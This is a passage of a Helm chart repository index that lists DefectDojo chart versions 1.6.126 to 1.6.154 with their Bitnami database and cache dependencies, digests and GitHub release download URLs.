apiVersion: v2 + appVersion: 2.39.1 + created: "2024-10-15T15:50:44.928726855Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.0.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 0be9d458f65127939a6bb8629319ba1ec354764015d6b42d44b58d26a38bf650 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.39.1/defectdojo-1.6.154.tgz + version: 1.6.154 + - apiVersion: v2 + appVersion: 2.39.0 + created: "2024-10-07T15:18:44.059709393Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~16.0.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 6e21edd5251a61dac9bc3e56dd95a5efa7b18c72a40adbb8a9a7bbd94ad3f7c5 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.39.0/defectdojo-1.6.153.tgz + version: 1.6.153 + - apiVersion: v2 + appVersion: 2.38.4 + created: "2024-09-26T19:12:44.450167792Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.5.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 9a5cbc37b4b63d36737de05cceccb676321299169976b03995691041c1188986 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.38.4/defectdojo-1.6.152.tgz + version: 1.6.152 + - apiVersion: v2 + appVersion: 2.38.3 + created: "2024-09-23T17:18:38.570734666Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.5.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: ecad277988b1ed067a5f5fe0034863df963e5b22116f236f04dd59859cade6e7 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.38.3/defectdojo-1.6.151.tgz + version: 1.6.151 + - apiVersion: v2 + appVersion: 2.38.2 + created: "2024-09-16T18:56:01.090675866Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.5.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: a739919cdef9ffff1a7dec13183f5ef2d3b5a154581011a0cba3584fb8094c41 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.38.2/defectdojo-1.6.150.tgz + version: 1.6.150 + - apiVersion: v2 + appVersion: 2.38.1 + created: "2024-09-09T15:51:22.130343692Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.5.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 719ab19c3ae3b2a71bf5956ddeb341646d28b6867f0b577b0ad4c417852adde9 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.38.1/defectdojo-1.6.149.tgz + version: 1.6.149 + - apiVersion: v2 + appVersion: 2.38.0 + created: "2024-09-03T16:46:03.478564213Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.5.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 7e8e308e28db0060eee46bad453f848659037cf20517adb3e005acd998cb5d14 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.38.0/defectdojo-1.6.148.tgz + version: 1.6.148 + - apiVersion: v2 + appVersion: 2.37.3 + created: "2024-08-26T16:49:40.844410089Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.5.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 69e3c74d02f9d993f3809a7e09f48ec2e2a43258b08c3f7c84ff0fdf5cb342f7 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.37.3/defectdojo-1.6.147.tgz + version: 1.6.147 + - apiVersion: v2 + appVersion: 2.37.2 + created: "2024-08-19T16:17:47.312472949Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.5.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 77687fd24d7b07b0c54671a45a8c07effaa963d5ccc80eeead8b53b7b527c12a + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.37.2/defectdojo-1.6.146.tgz + version: 1.6.146 + - apiVersion: v2 + appVersion: 2.37.1 + created: "2024-08-12T17:43:08.760935902Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.5.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 000a54d653eaf5c4f99d1053a31c77de2a9885814ccd6a446a6618ad48804c7f + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.37.1/defectdojo-1.6.145.tgz + version: 1.6.145 + - apiVersion: v2 + appVersion: 2.37.0 + created: "2024-08-05T16:54:58.304543855Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.5.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.6.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 9b8d5c2589ea812277e27ff2492163d68457918496aafb568f1264bacbfb3500 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.37.0/defectdojo-1.6.144.tgz + version: 1.6.144 + - apiVersion: v2 + appVersion: 2.36.6 + created: "2024-07-29T18:45:38.119783177Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.5.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~14.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.5.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: e961cde37cb94312978f79db5ccefa9ccdf076415460f03f23ac1acee8e9d653 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.36.6/defectdojo-1.6.143.tgz + version: 1.6.143 + - apiVersion: v2 + appVersion: 2.36.5 + created: "2024-07-24T21:49:01.45362013Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.5.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~14.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.5.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 198558f0c9df20945def385133a9b60ca3a295de2534dfe69440ef2cfbe559da + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.36.5/defectdojo-1.6.142.tgz + version: 1.6.142 + - apiVersion: v2 + appVersion: 2.36.4 + created: "2024-07-22T15:33:28.012445062Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.5.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~14.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.5.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 1e318acce893112acf61a024838610a314e89548668ecf87a3dd2ebf2d1b3c88 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.36.4/defectdojo-1.6.141.tgz + version: 1.6.141 + - apiVersion: v2 + appVersion: 2.36.3 + created: "2024-07-15T16:48:21.727414273Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.5.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~14.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.5.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 8448dc79505a24ac0cb453a50a0027cd04ab2b7cf3e3c2a80af3f553134b93ec + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.36.3/defectdojo-1.6.140.tgz + version: 1.6.140 + - apiVersion: v2 + appVersion: 2.36.2 + created: "2024-07-09T17:16:54.394527732Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.5.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~14.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.5.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 996dad7cc2c577ab3a6c6998fa041b65ef23d0f3e209d2041327f38c9fc130da + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.36.2/defectdojo-1.6.139.tgz + version: 1.6.139 + - apiVersion: v2 + appVersion: 2.36.1 + created: "2024-07-08T18:05:16.288035686Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.5.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~14.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.5.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 4c4acad5a577d09ba90d69d7f440fd57fe655156943db2002e372ec25515d633 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.36.1/defectdojo-1.6.138.tgz + version: 1.6.138 + - apiVersion: v2 + appVersion: 2.36.0 + created: "2024-07-01T15:30:34.651994736Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.5.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~14.4.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.5.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 534c6adbd222a02a865ff3f64efecf87be5961955202397f24f8c547a06a4c2a + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.36.0/defectdojo-1.6.137.tgz + version: 1.6.137 + - apiVersion: v2 + appVersion: 2.35.4 + created: "2024-06-24T18:15:45.886106345Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.5.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~14.3.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.5.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 18ada9b5e681b9469c0ba3b53c33600f13f3dd116fd5fdc5c9d5bc3eda23c8b4 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.35.4/defectdojo-1.6.136.tgz + version: 1.6.136 + - apiVersion: v2 + appVersion: 2.35.3 + created: "2024-06-17T17:19:14.638877193Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.5.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~14.3.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.5.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: f1fb67d744f9123a559c50b49615d8bece0ba699cd21ebb5d04a12b9408cf361 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.35.3/defectdojo-1.6.135.tgz + version: 1.6.135 + - apiVersion: v2 + appVersion: 2.35.2 + created: "2024-06-10T22:43:20.791971121Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.5.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~14.3.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.5.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: ce7dcfac4570acbdca3a8a9b128c2f2f0d5c00a17ff0eee6385ed8060b746986 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.35.2/defectdojo-1.6.134.tgz + version: 1.6.134 + - apiVersion: v2 + appVersion: 2.35.1 + created: "2024-06-06T21:23:31.753675839Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.5.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~14.3.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.5.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 60addd9e1c87c6488c224aca593ea1900350ec40e8c6b5909f16b33b3bb7c7e6 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.35.1/defectdojo-1.6.133.tgz + version: 1.6.133 + - apiVersion: v2 + appVersion: 2.35.0 + created: "2024-06-03T20:21:38.457272137Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.5.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~14.3.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.5.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 88518f51dcae23eacd5be5c8bd446a496733357d3885173fe82f6ab5427ae734 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.35.0/defectdojo-1.6.132.tgz + version: 1.6.132 + - apiVersion: v2 + appVersion: 2.34.5 + created: "2024-05-28T17:44:47.10700304Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.2.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~14.1.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.1.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 4d3abd2071ee49573ecf979d0a1a21c6af97d546faf494656dbef85afe5e0c05 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.34.5/defectdojo-1.6.131.tgz + version: 1.6.131 + - apiVersion: v2 + appVersion: 2.34.4 + created: "2024-05-20T18:32:48.85749345Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.2.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~14.1.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.1.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 16bebb8987c85b7668cf1da499604c50a181c40c71e429986da402c400f4f0a3 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.34.4/defectdojo-1.6.130.tgz + version: 1.6.130 + - apiVersion: v2 + appVersion: 2.34.3 + created: "2024-05-13T17:32:42.99650485Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.2.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~14.1.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.1.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 1b0f5a9e75c7a2798f08e715e084c2059cead5de54baa03b90a45bbd251619c2 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.34.3/defectdojo-1.6.129.tgz + version: 1.6.129 + - apiVersion: v2 + appVersion: 2.34.2 + created: "2024-05-08T23:05:21.236337895Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.2.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~14.1.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.1.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: ccced63e8b08a5bbd67d8fb524783c8445729d798d9bd2a0c194a506a33ff8be + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.34.2/defectdojo-1.6.128.tgz + version: 1.6.128 + - apiVersion: v2 + appVersion: 2.34.1 + created: "2024-05-08T01:29:37.556330642Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.2.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~14.1.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.1.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 0d24afa34659c66505a56e44caabb90a9afd04a96f9e8687b9682074f8fcedec + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.34.1/defectdojo-1.6.127.tgz + version: 1.6.127 + - apiVersion: v2 + appVersion: 2.34.0 + created: "2024-05-06T18:31:59.348875518Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.2.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~14.1.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.1.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: a68a087832dd601b76e270156e3d60ce9a51e85f67e2d6fa8ab846123c8ad80c + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.34.0/defectdojo-1.6.126.tgz + version: 1.6.126 + - apiVersion: v2 + appVersion: 2.33.7 + created: "2024-04-29T17:54:16.544722544Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.1.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~11.16.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.0.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: a991cf00bf44493106b032b5305a3fcec273492c8dc0173c287975a281538010 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: 